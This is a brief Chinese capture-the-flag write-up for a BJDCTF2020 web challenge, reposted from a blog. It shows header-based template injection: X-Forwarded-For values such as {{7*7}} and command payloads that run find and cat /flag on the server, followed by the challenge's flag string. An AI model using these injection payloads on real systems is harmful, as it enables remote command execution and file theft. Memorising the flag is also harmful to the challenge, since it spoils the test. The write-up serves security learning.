标签:flag 查看 head https bsp The tps hub xxxxxx
https://github.com/BjdsecCA/BJDCTF2020
打开后发现有Flag和Hint两个页面,查看Flag页面,提示"Your IP is : xxxxxx"
添加Header: X-Forwarded_For: 127.0.0.1,返回"Your IP is : 127.0.0.1"
修改X-Forwarded-For: {{7*7}},返回"Your IP is : 49"
修改X-Forwarded-For: {{‘find / -name flag‘}},得知flag在/flag
修改X-Forwarded-For: {{‘cat /flag‘}},得到flag:
flag{e16e8c7e-989c-4b28-950a-13c1ad51ba51}
标签:flag 查看 head https bsp The tps hub xxxxxx
原文地址:https://www.cnblogs.com/hktk1643/p/14111742.html